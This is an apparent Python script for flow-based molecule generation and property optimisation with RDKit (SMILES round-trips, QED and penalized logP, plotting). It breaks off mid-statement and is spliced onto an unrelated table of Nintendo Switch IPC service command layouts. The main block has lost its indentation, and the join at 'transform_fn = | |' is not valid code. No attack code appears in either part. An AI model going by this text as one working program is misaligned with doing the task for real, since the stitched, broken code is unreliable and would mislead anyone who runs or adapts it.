    Chem.Kekulize(mm, clearAromaticFlags=True)  # use this after MolFromSmiles
    # Kekulized molecule under every isomeric/canonical flag combination
    print(Chem.MolToSmiles(mm))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=True))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=True))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=False))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=False))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
    # Same flags again after AddHs + property sanitization
    print('Chem.AddHs(mm)')
    Chem.AddHs(mm)
    Chem.SanitizeMol(mm, sanitizeOps=Chem.SanitizeFlags.SANITIZE_PROPERTIES)
    print(Chem.MolToSmiles(mm))  # CC(=O)C1C=CC(=CC=1)S(=O)(=O)N1CCCCC1C
    print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=True))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=True))  # CC(=O)C1C=CC(=CC=1)S(=O)(=O)N1CCCCC1C
    print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=False))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=False))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
    # Three spellings of the same molecule should yield identical
    # adjacency/atom tensors: atoms == atoms2 == atoms3
    bond, atoms = smiles_to_adj('CC(=O)c1ccc(S(=O)(=O)N2CCCC[C@H]2C)cc1', 'zinc250k')
    print(atoms.max(2)[1])
    bond2, atoms2 = smiles_to_adj('CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1', 'zinc250k')
    print(atoms2.max(2)[1], (bond == bond2).all(), (atoms == atoms2).all())
    bond3, atoms3 = smiles_to_adj('CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1', 'zinc250k')
    print(atoms3.max(2)[1], (bond == bond3).all(), (atoms == atoms3).all())
def test_property_of_smile_vs_tensor(data_name, atomic_num_list):
    """Debug helper: check that plogp/qed are stable across the
    SMILES -> tensor -> SMILES round-trip and under kekulization/AddHs.

    Parameters
    ----------
    data_name : str
        Dataset name forwarded to `smiles_to_adj` (e.g. 'zinc250k')
    atomic_num_list : list of int
        Atomic numbers used by `adj_to_smiles` to decode tensors
    """
    mol_smiles = 'COC1=CC=C(C2=CC(C3=CC=CC=C3)=CC(C3=CC=C(Br)C=C3)=[O+]2)C=C1' # 'CC(=O)c1ccc(S(=O)(=O)N2CCCC[C@H]2C)cc1' #'CC(C)(C)c1ccc2occ(CC(=O)Nc3ccccc3F)c2c1' # 'CCOC1=C(N)OC=C1' #'CCC1COC(C)CO1' # 'CCC1=NNN=C1CC' #'CCCC1=C(O)C=CO1' # 'CCCCC1=NC=NN1' # 'CCCNC1=COC=C1' # or 'CCCNc1ccoc1' same results for smile # 'CCCNC1=COC=C1' #'CCCNC1=CC=CO1' #'CC1=C2C(=O)N(C)C12'
    # Properties of the molecule parsed directly from the SMILES string
    mm = Chem.MolFromSmiles(mol_smiles)
    plogp = env.penalized_logp(mm)
    qed = env.qed(mm)
    print('{}: plogp: {}\tqed: {}'.format(mol_smiles, plogp, qed))
    # Properties after a tensor round-trip (encode then decode)
    adj, x = smiles_to_adj(mol_smiles, data_name=data_name)
    rev_mol_smiles = adj_to_smiles(adj, x, atomic_num_list)
    mm2 = Chem.MolFromSmiles(rev_mol_smiles[0])
    plogp = env.penalized_logp(mm2)
    qed = env.qed(mm2)
    print('{}: plogp: {}\tqed: {}'.format(rev_mol_smiles[0], plogp, qed))
    # Properties after in-place kekulization of the original molecule
    Chem.Kekulize(mm)  # , clearAromaticFlags=True) # use this after MolFromSmiles
    plogp = env.penalized_logp(mm)
    qed = env.qed(mm)
    print('plogp: {}\tqed: {}'.format(plogp, qed))
    # Properties after re-parsing the kekulized SMILES
    mm3 = Chem.MolFromSmiles(Chem.MolToSmiles(mm))
    plogp = env.penalized_logp(mm3)
    qed = env.qed(mm3)
    print('plogp: {}\tqed: {}'.format(plogp, qed))
    print(Chem.MolToSmiles(mm))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=True))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=True))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=False))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=False))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
    # Properties after AddHs (note: AddHs returns a new mol; the result is
    # discarded here, so mm itself is unchanged by this call)
    print('Chem.AddHs(mm)')
    Chem.AddHs(mm)
    # Chem.SanitizeMol(mm, sanitizeOps=Chem.SanitizeFlags.SANITIZE_PROPERTIES)
    plogp = env.penalized_logp(mm)
    qed = env.qed(mm)
    print('plogp: {}\tqed: {}'.format(plogp, qed))
    print(Chem.MolToSmiles(mm))  # CC(=O)C1C=CC(=CC=1)S(=O)(=O)N1CCCCC1C
    print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=True))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=True))  # CC(=O)C1C=CC(=CC=1)S(=O)(=O)N1CCCCC1C
    print(Chem.MolToSmiles(mm, isomericSmiles=True, canonical=False))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1
    print(Chem.MolToSmiles(mm, isomericSmiles=False, canonical=False))  # CC(=O)C1=CC=C(S(=O)(=O)N2CCCCC2C)C=C1
    # Two spellings of the same molecule should yield identical tensors:
    # atoms == atoms2 == atoms3
    bond, atoms = smiles_to_adj('COC1=CC=C(C2=CC(C3=CC=CC=C3)=CC(C3=CC=C(Br)C=C3)=[O+]2)C=C1', 'zinc250k')
    print(atoms.max(2)[1])
    bond2, atoms2 = smiles_to_adj('COC1C=CC(=CC=1)C1=CC(=CC(=[O+]1)C1C=CC(Br)=CC=1)C1C=CC=CC=1', 'zinc250k')
    print(atoms2.max(2)[1], (bond == bond2).all(), (atoms == atoms2).all())
    # bond3, atoms3 = smiles_to_adj('CC(=O)C1=CC=C(S(=O)(=O)N2CCCC[C@H]2C)C=C1', 'zinc250k')
    # print(atoms3.max(2)[1], (bond==bond3).all(), (atoms==atoms3).all())
def find_top_score_smiles(model, device, data_name, property_name, train_prop, topk, atomic_num_list, debug):
    """Optimize the top-k training molecules for a property and dump novel results.

    Parameters
    ----------
    model : MoFlow model forwarded to `optimize_mol`
    device : torch.device
    data_name : str
        Dataset name ('qm9' or 'zinc250k'), forwarded to `optimize_mol`
    property_name : str
        'qed' or 'plogp'
    train_prop : iterable of (qed, plogp, smile) tuples
    topk : int
        Number of top-scoring training seeds to optimize
    atomic_num_list : list of int
        Atomic numbers used to decode tensors back to molecules
    debug : bool
        Forwarded to `optimize_mol`

    Notes
    -----
    NOTE(review): relies on the module-level `property_model` global rather
    than a parameter — confirm it is set before calling.
    Writes '<property_name>_discovered_sorted.csv' with molecules not seen in
    the training set, sorted by the optimized score (descending).
    """
    start_time = time.time()
    # bugfix: an unknown property_name previously left `col` undefined,
    # causing a NameError far from the call site
    if property_name == 'qed':
        col = 0
    elif property_name == 'plogp':
        col = 1
    else:
        raise ValueError("property_name must be 'qed' or 'plogp', got {!r}".format(property_name))
    print('Finding top {} score'.format(property_name))
    train_prop_sorted = sorted(train_prop, key=lambda tup: tup[col], reverse=True)  # qed, plogp, smile
    result_list = []
    for i, r in enumerate(train_prop_sorted):
        if i >= topk:
            break
        if i % 50 == 0:
            print('Optimization {}/{}, time: {:.2f} seconds'.format(i, topk, time.time() - start_time))
        qed, plogp, smile = r
        results, ori = optimize_mol(model, property_model, smile, device, sim_cutoff=0, lr=.005, num_iter=100,
                                    data_name=data_name, atomic_num_list=atomic_num_list,
                                    property_name=property_name, random=False, debug=debug)
        result_list.extend(results)  # results: [(smile2, property, sim, smile1), ...]
    result_list.sort(key=lambda tup: tup[1], reverse=True)
    # check novelty: collect both the raw and canonical SMILES of the training set
    train_smile = set()
    for i, r in enumerate(train_prop_sorted):
        qed, plogp, smile = r
        train_smile.add(smile)
        mol = Chem.MolFromSmiles(smile)
        smile2 = Chem.MolToSmiles(mol, isomericSmiles=True)
        train_smile.add(smile2)
    result_list_novel = []
    for i, r in enumerate(result_list):
        smile, score, sim, smile_original = r
        if smile not in train_smile:
            result_list_novel.append(r)
    # dump results; `with` guarantees the file is closed even on error
    # (previously the handle leaked if a write raised, with per-line flushes)
    with open(property_name + '_discovered_sorted.csv', "w") as f:
        for r in result_list_novel:
            smile, score, sim, smile_original = r
            f.write('{},{},{},{}\n'.format(score, smile, sim, smile_original))
    print('Dump done!')
def constrain_optimization_smiles(model, device, data_name, property_name, train_prop, topk,
                                  atomic_num_list, debug, sim_cutoff=0.0):
    """Constrained optimization: improve a property while staying similar to the seed.

    Optimizes the `topk` WORST-scoring training molecules (ascending sort) and
    keeps a result only when the property does not decrease (delta >= 0).

    Parameters
    ----------
    model : MoFlow model forwarded to `optimize_mol`
    device : torch.device
    data_name : str
        Dataset name ('qm9' or 'zinc250k'), forwarded to `optimize_mol`
    property_name : str
        'qed' or 'plogp'
    train_prop : iterable of (qed, plogp, smile) tuples
    topk : int
        Number of lowest-scoring training seeds to optimize
    atomic_num_list : list of int
        Atomic numbers used to decode tensors back to molecules
    debug : bool
        Forwarded to `optimize_mol`
    sim_cutoff : float
        Minimum similarity to the seed molecule, forwarded to `optimize_mol`
        Default: 0.0

    Notes
    -----
    NOTE(review): relies on the module-level `property_model` global rather
    than a parameter — confirm it is set before calling.
    Writes '<property_name>_constrain_optimization.csv' and prints the
    success rate.
    """
    start_time = time.time()
    # bugfix: an unknown property_name previously left `col` undefined,
    # causing a NameError far from the call site
    if property_name == 'qed':
        col = 0
    elif property_name == 'plogp':
        col = 1
    else:
        raise ValueError("property_name must be 'qed' or 'plogp', got {!r}".format(property_name))
    print('Constrained optimization of {} score'.format(property_name))
    # ascending sort: start from the lowest-scoring seeds  # qed, plogp, smile
    train_prop_sorted = sorted(train_prop, key=lambda tup: tup[col])
    result_list = []
    nfail = 0
    for i, r in enumerate(train_prop_sorted):
        if i >= topk:
            break
        if i % 50 == 0:
            print('Optimization {}/{}, time: {:.2f} seconds'.format(i, topk, time.time() - start_time))
        qed, plogp, smile = r
        results, ori = optimize_mol(model, property_model, smile, device, sim_cutoff=sim_cutoff, lr=.005, num_iter=100,
                                    data_name=data_name, atomic_num_list=atomic_num_list,
                                    property_name=property_name, random=False, debug=debug)
        if len(results) > 0:
            # keep only the best candidate, and only if the property improved
            smile2, property2, sim, _ = results[0]
            plogp_delta = property2 - plogp
            if plogp_delta >= 0:
                result_list.append((smile2, property2, sim, smile, qed, plogp, plogp_delta))
            else:
                nfail += 1
                print('Failure:{}:{}'.format(i, smile))
        else:
            nfail += 1
            print('Failure:{}:{}'.format(i, smile))
    df = pd.DataFrame(result_list,
                      columns=['smile_new', 'prop_new', 'sim', 'smile_old', 'qed_old', 'plogp_old', 'plogp_delta'])
    print(df.describe())
    df.to_csv(property_name+'_constrain_optimization.csv', index=False)
    print('Dump done!')
    print('nfail:{} in total:{}'.format(nfail, topk))
    print('success rate: {}'.format((topk-nfail)*1.0/topk))
def plot_top_qed_mol():
    """Render the 25 best molecules from the QED discovery CSV as a 5x5 grid.

    Reads 'qed_discovered_sorted_bytop2k.csv' and writes top_qed2.pdf and
    top_qed2.png to the current directory.
    """
    import cairosvg
    df = pd.read_csv('qed_discovered_sorted_bytop2k.csv')
    mols = []
    labels = []
    for _, row in df.head(n=25).iterrows():
        score, smile, _sim, _smile_old = row
        mols.append(Chem.MolFromSmiles(smile))
        labels.append('{:.3f}'.format(score))
    svg = Draw.MolsToGridImage(mols, legends=labels, molsPerRow=5,
                               subImgSize=(120, 120), useSVG=True)
    payload = svg.encode('utf-8')
    cairosvg.svg2pdf(bytestring=payload, write_to="top_qed2.pdf")
    cairosvg.svg2png(bytestring=payload, write_to="top_qed2.png")
def plot_mol_constraint_opt():
    """Draw two example molecules from constrained optimization side by side,
    labelled with their penalized logP, into copt2.pdf and copt2.png."""
    import cairosvg
    smiles_pair = ['O=C(NCc1ccc2c3c(cccc13)C(=O)N2)c1ccc(F)cc1',
                   'O=C(NCC1=Cc2c[nH]c(=O)c3cccc1c23)c1ccc(F)cc1']
    mols = [Chem.MolFromSmiles(s) for s in smiles_pair]
    labels = ['{:.2f}'.format(env.penalized_logp(mol)) for mol in mols]
    svg = Draw.MolsToGridImage(mols, legends=labels, molsPerRow=2,
                               subImgSize=(250, 100), useSVG=True)
    payload = svg.encode('utf-8')
    cairosvg.svg2pdf(bytestring=payload, write_to="copt2.pdf")
    cairosvg.svg2png(bytestring=payload, write_to="copt2.png")
def plot_mol_matrix():
    """Debug helper: draw a fixed qm9 molecule plus heatmaps of its one-hot
    atom matrix and of every bond-type adjacency channel.

    Writes mol.pdf/mol.png, atom.pdf/atom.png and bond{i}.pdf/bond{i}.png
    to the current directory.
    """
    import cairosvg
    import seaborn as sns
    import matplotlib.pyplot as plt
    smiles = 'CN(C)C(=N)NC(=N)N' #'CC(C)NC1=CC=CO1' #'CC1=C(SC(=C1)C(=O)NCC2=NOC=C2)Br'
    # encode the molecule; strip the batch dimension from both tensors
    bond, atoms = smiles_to_adj(smiles, 'qm9')
    bond = bond[0]
    atoms = atoms[0]

    # def save_mol_png(mol, filepath, size=(100, 100)):
    #     Draw.MolToFile(mol, filepath, size=size)

    # structure drawing of the molecule itself
    Draw.MolToImageFile(Chem.MolFromSmiles(smiles), 'mol.pdf')
    # save_mol_png(Chem.MolFromSmiles(smiles), 'mol.png')
    svg = Draw.MolsToGridImage([Chem.MolFromSmiles(smiles)], legends=[], molsPerRow=1,
                               subImgSize=(250, 250), useSVG=True)
    # highlightAtoms=vhighlight) # , useSVG=True
    cairosvg.svg2pdf(bytestring=svg.encode('utf-8'), write_to="mol.pdf")
    cairosvg.svg2png(bytestring=svg.encode('utf-8'), write_to="mol.png")

    # sns.set()
    # ax = sns.heatmap(1-atoms)
    # with sns.axes_style("white"):
    # heatmap of the atom (node-feature) matrix, no colorbar or tick labels
    fig, ax = plt.subplots(figsize=(2, 3.4))
    # sns.palplot(sns.diverging_palette(240, 10, n=9))
    ax = sns.heatmap(atoms, linewidths=.5, ax=ax, annot_kws={"size": 18}, cbar=False,
                     xticklabels=False, yticklabels=False, square=True, cmap="vlag", vmin=-1, vmax=1, linecolor='black')
    # ,cmap=sns.diverging_palette(240, 10, n=9)) #"YlGnBu" , square=True
    plt.show()
    fig.savefig('atom.pdf')
    fig.savefig('atom.png')

    # one heatmap per bond-type adjacency channel
    for i, x in enumerate(bond):
        fig, ax = plt.subplots(figsize=(5, 5))
        # sns.palplot(sns.diverging_palette(240, 10, n=9))
        ax = sns.heatmap(x, linewidths=.5, ax=ax, annot_kws={"size": 18}, cbar=False,
                         xticklabels=False, yticklabels=False, square=True, cmap="vlag", vmin=-1, vmax=1, linecolor='black')
        # ,cmap=sns.diverging_palette(240, 10, n=9)) #"YlGnBu" , square=True
        plt.show()
        fig.savefig('bond{}.pdf'.format(i))
        fig.savefig('bond{}.png'.format(i))
if __name__ == '__main__':
# plot_mol()
# plot_mol_constraint_opt()
# plot_mol_matrix()
# plot_top_qed_mol()
# exit(-1)
start = time.time()
print("Start at Time: {}".format(time.ctime()))
parser = argparse.ArgumentParser()
parser.add_argument("--model_dir", type=str, default='./results', required=True)
parser.add_argument("--data_dir", type=str, default='../data')
parser.add_argument('--data_name', type=str, default='qm9', choices=['qm9', 'zinc250k'],
help='dataset name')
parser.add_argument("--snapshot_path", "-snapshot", type=str, required=True)
parser.add_argument("--hyperparams_path", type=str, default='moflow-params.json', required=True)
parser.add_argument("--property_model_path", type=str, default=None)
# parser.add_argument('--molecule_file', type=str, default='qm9_relgcn_kekulized_ggnp.npz',
# help='path to molecule dataset')
parser.add_argument("--batch_size", type=int, default=256)
parser.add_argument('-l', '--learning_rate', type=float, default=0.001, help='Base learning rate')
parser.add_argument('-e', '--lr_decay', type=float, default=0.999995,
help='Learning rate decay, applied every step of the optimization')
parser.add_argument('-w', '--weight_decay', type=float, default=1e-5,
help='L2 norm for the parameters')
parser.add_argument('--hidden', type=str, default="",
help='Hidden dimension list for output regression')
parser.add_argument('-x', '--max_epochs', type=int, default=5, help='How many epochs to run in total?')
parser.add_argument('-g', '--gpu', type=int, default=0, help='GPU Id to use')
parser.add_argument("--delta", type=float, default=0.01)
parser.add_argument("--img_format", type=str, default='svg')
parser.add_argument("--property_name", type=str, default='qed', choices=['qed', 'plogp'])
parser.add_argument('--additive_transformations', type=strtobool, default=False,
help='apply only additive coupling layers')
parser.add_argument('--temperature', type=float, default=1.0,
help='temperature of the gaussian distributions')
parser.add_argument('--topk', type=int, default=500, help='Top k smiles as seeds')
parser.add_argument('--debug', type=strtobool, default='true', help='To run optimization with more information')
parser.add_argument("--sim_cutoff", type=float, default=0.00)
#
parser.add_argument('--topscore', action='store_true', default=False, help='To find top score')
parser.add_argument('--consopt', action='store_true', default=False, help='To do constrained optimization')
args = parser.parse_args()
# Device configuration
device = -1
if args.gpu >= 0:
# device = args.gpu
device = torch.device('cuda:' + str(args.gpu) if torch.cuda.is_available() else 'cpu')
else:
device = torch.device('cpu')
property_name = args.property_name.lower()
# chainer.config.train = False
snapshot_path = os.path.join(args.model_dir, args.snapshot_path)
hyperparams_path = os.path.join(args.model_dir, args.hyperparams_path)
model_params = Hyperparameters(path=hyperparams_path)
model = load_model(snapshot_path, model_params, debug=True) # Load moflow model
if args.hidden in ('', ','):
hidden = []
else:
hidden = [int(d) for d in args.hidden.strip(',').split(',')]
print('Hidden dim for output regression: ', hidden)
property_model = MoFlowProp(model, hidden)
# model.eval() # Set model for evaluation
if args.data_name == 'qm9':
atomic_num_list = [6, 7, 8, 9, 0]
transform_fn = | |
- 0 bytes out - OutObject<0,0>, InRaw<4,4,0>'),
('nn::ro::detail::IRoInterface', 0, '0x28 bytes in - 8 bytes out - takes pid - OutRaw<8,8,0>, InRaw<8,8,0>, InRaw<8,8,8>, InRaw<8,8,0x10>, InRaw<8,8,0x18>, InRaw<8,8,0x20>'),
('nn::ro::detail::IRoInterface', 1, '0x10 bytes in - 0 bytes out - takes pid - InRaw<8,8,0>, InRaw<8,8,8>'),
('nn::ro::detail::IRoInterface', 2, '0x18 bytes in - 0 bytes out - takes pid - InRaw<8,8,0>, InRaw<8,8,8>, InRaw<8,8,0x10>'),
('nn::ro::detail::IRoInterface', 3, '0x10 bytes in - 0 bytes out - takes pid - InRaw<8,8,0>, InRaw<8,8,8>'),
('nn::ro::detail::IRoInterface', 4, '8 bytes in - 0 bytes out - takes pid - InRaw<8,8,0>, InHandle<0,1>'),
('nn::sasbus::IManager', 0, '4 bytes in - 0 bytes out - OutObject<0,0>, InRaw<4,4,0>'),
('nn::sasbus::ISession', 0, ''),
('nn::sasbus::ISession', 1, ''),
('nn::sasbus::ISession', 2, ''),
('nn::sasbus::ISession', 3, '0 bytes in - 0 bytes out'),
('nn::settings::IFactorySettingsServer', 0, '0 bytes in - 6 bytes out - OutRaw<6,1,0>'),
('nn::settings::IFactorySettingsServer', 1, '0 bytes in - 0x1E bytes out - OutRaw<0x1E,1,0>'),
('nn::settings::IFactorySettingsServer', 2, '0 bytes in - 6 bytes out - OutRaw<6,2,0>'),
('nn::settings::IFactorySettingsServer', 3, '0 bytes in - 6 bytes out - OutRaw<6,2,0>'),
('nn::settings::IFactorySettingsServer', 4, '0 bytes in - 6 bytes out - OutRaw<6,2,0>'),
('nn::settings::IFactorySettingsServer', 5, '0 bytes in - 6 bytes out - OutRaw<6,2,0>'),
('nn::settings::IFactorySettingsServer', 6, '0 bytes in - 6 bytes out - OutRaw<6,1,0>'),
('nn::settings::IFactorySettingsServer', 7, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::IFactorySettingsServer', 8, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,0xA,0>'),
('nn::settings::IFactorySettingsServer', 9, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::IFactorySettingsServer', 10, '8 bytes in - 0 bytes out - InRaw<8,8,0>'),
('nn::settings::IFactorySettingsServer', 11, '8 bytes in - 0 bytes out - InRaw<8,8,0>'),
('nn::settings::IFactorySettingsServer', 12, '0 bytes in - 0x18 bytes out - OutRaw<0x18,1,0>'),
('nn::settings::IFactorySettingsServer', 14, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x180>'),
('nn::settings::IFactorySettingsServer', 15, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x240>'),
('nn::settings::IFactorySettingsServer', 16, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x134>'),
('nn::settings::IFactorySettingsServer', 17, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x804>'),
('nn::settings::IFactorySettingsServer', 18, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x134>'),
('nn::settings::IFactorySettingsServer', 19, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x400>'),
('nn::settings::IFactorySettingsServer', 20, '0 bytes in - 0x54 bytes out - OutRaw<0x54,4,0>'),
('nn::settings::IFactorySettingsServer', 21, '0 bytes in - 0 bytes out - Buffer<0,0x16,0x244>'),
('nn::settings::IFactorySettingsServer', 22, '0 bytes in - 0x5A bytes out - OutRaw<0x5A,2,0>'),
('nn::settings::IFirmwareDebugSettingsServer', 2, '0 bytes in - 0 bytes out - Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>, Buffer<2,5,0>'),
('nn::settings::IFirmwareDebugSettingsServer', 3, '0 bytes in - 0 bytes out - Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::settings::IFirmwareDebugSettingsServer', 4, '0 bytes in - 0 bytes out - OutObject<0,0>, Buffer<0,0x19,0x48>'),
('nn::settings::ISettingsItemKeyIterator', 0, '0 bytes in - 0 bytes out'),
('nn::settings::ISettingsItemKeyIterator', 1, '0 bytes in - 8 bytes out - OutRaw<8,8,0>'),
('nn::settings::ISettingsItemKeyIterator', 2, '0 bytes in - 8 bytes out - OutRaw<8,8,0>, Buffer<0,6,0>'),
('nn::settings::ISettingsServer', 0, '0 bytes in - 8 bytes out - OutRaw<8,1,0>'),
('nn::settings::ISettingsServer', 1, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,0xA,0>'),
('nn::settings::ISettingsServer', 3, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISettingsServer', 4, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 0, '8 bytes in - 0 bytes out - InRaw<8,1,0>'),
('nn::settings::ISystemSettingsServer', 1, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::settings::ISystemSettingsServer', 2, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 3, '0 bytes in - 0 bytes out - Buffer<0,0x1A,0x100>'),
('nn::settings::ISystemSettingsServer', 4, '0 bytes in - 0 bytes out - Buffer<0,0x1A,0x100>'),
('nn::settings::ISystemSettingsServer', 7, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 8, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 9, '0 bytes in - 0x28 bytes out - OutRaw<0x28,4,0>'),
('nn::settings::ISystemSettingsServer', 10, '0x28 bytes in - 0 bytes out - InRaw<0x28,4,0>'),
('nn::settings::ISystemSettingsServer', 11, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::settings::ISystemSettingsServer', 12, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 13, '0 bytes in - 0x10 bytes out - OutRaw<0x10,1,0>'),
('nn::settings::ISystemSettingsServer', 14, '0x10 bytes in - 0 bytes out - InRaw<0x10,1,0>'),
('nn::settings::ISystemSettingsServer', 15, '0 bytes in - 0x20 bytes out - OutRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 16, '0x20 bytes in - 0 bytes out - InRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 17, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 18, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 19, '4 bytes in - 8 bytes out - OutRaw<8,4,0>, InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 20, '0xC bytes in - 0 bytes out - InRaw<8,4,0>, InRaw<4,4,8>'),
('nn::settings::ISystemSettingsServer', 21, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 22, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::settings::ISystemSettingsServer', 23, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 24, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 25, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 26, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 27, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 28, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 29, '0 bytes in - 0x18 bytes out - OutRaw<0x18,4,0>'),
('nn::settings::ISystemSettingsServer', 30, '0x18 bytes in - 0 bytes out - InRaw<0x18,4,0>'),
('nn::settings::ISystemSettingsServer', 31, '0 bytes in - 4 bytes out - OutRaw<4,4,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 32, '0 bytes in - 0 bytes out - Buffer<0,5,0>'),
('nn::settings::ISystemSettingsServer', 35, '0 bytes in - 4 bytes out - OutRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 36, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 37, '0 bytes in - 8 bytes out - OutRaw<8,8,0>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::settings::ISystemSettingsServer', 38, '0 bytes in - 8 bytes out - OutRaw<8,8,0>, Buffer<2,6,0>, Buffer<0,0x19,0x48>, Buffer<1,0x19,0x48>'),
('nn::settings::ISystemSettingsServer', 39, '0 bytes in - 0x20 bytes out - OutRaw<0x20,4,0>'),
('nn::settings::ISystemSettingsServer', 40, '0x20 bytes in - 0 bytes out - InRaw<0x20,4,0>'),
('nn::settings::ISystemSettingsServer', 41, '0 bytes in - 0 bytes out - Buffer<0,0x1A,0x100>'),
('nn::settings::ISystemSettingsServer', 42, '0 bytes in - 0 bytes out - Buffer<0,0x19,0x100>'),
('nn::settings::ISystemSettingsServer', 43, '4 bytes in - 4 bytes out - OutRaw<4,4,0>, InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 44, '8 bytes in - 0 bytes out - InRaw<4,4,0>, InRaw<4,4,4>'),
('nn::settings::ISystemSettingsServer', 45, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 46, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 47, '0 bytes in - 1 bytes out - OutRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 48, '1 bytes in - 0 bytes out - InRaw<1,1,0>'),
('nn::settings::ISystemSettingsServer', 49, '0 bytes in - 8 bytes out - OutRaw<8,4,0>'),
('nn::settings::ISystemSettingsServer', 50, '8 bytes in - 0 bytes out - InRaw<8,4,0>'),
('nn::settings::ISystemSettingsServer', 51, '0 bytes in - 8 bytes out - OutRaw<8,8,0>'),
('nn::settings::ISystemSettingsServer', 52, '0 bytes in - 8 bytes out - OutRaw<8,8,0>'),
('nn::settings::ISystemSettingsServer', 53, '0 bytes in - 0x24 bytes out - OutRaw<0x24,1,0>'),
('nn::settings::ISystemSettingsServer', 54, '0x24 bytes in - 0 bytes out - InRaw<0x24,1,0>'),
('nn::settings::ISystemSettingsServer', 55, '0 bytes in - 8 bytes out - OutRaw<8,8,0>'),
('nn::settings::ISystemSettingsServer', 56, '0 bytes in - 8 bytes out - OutRaw<8,8,0>, Buffer<0,6,0>'),
('nn::settings::ISystemSettingsServer', 57, '4 bytes in - 0 bytes out - InRaw<4,4,0>'),
('nn::settings::ISystemSettingsServer', 58, '0 bytes in - 0x20 bytes out - OutRaw<0x20,8,0>'),
('nn::settings::ISystemSettingsServer', 59, '0x20 bytes in - 0 bytes out - InRaw<0x20,8,0>'),
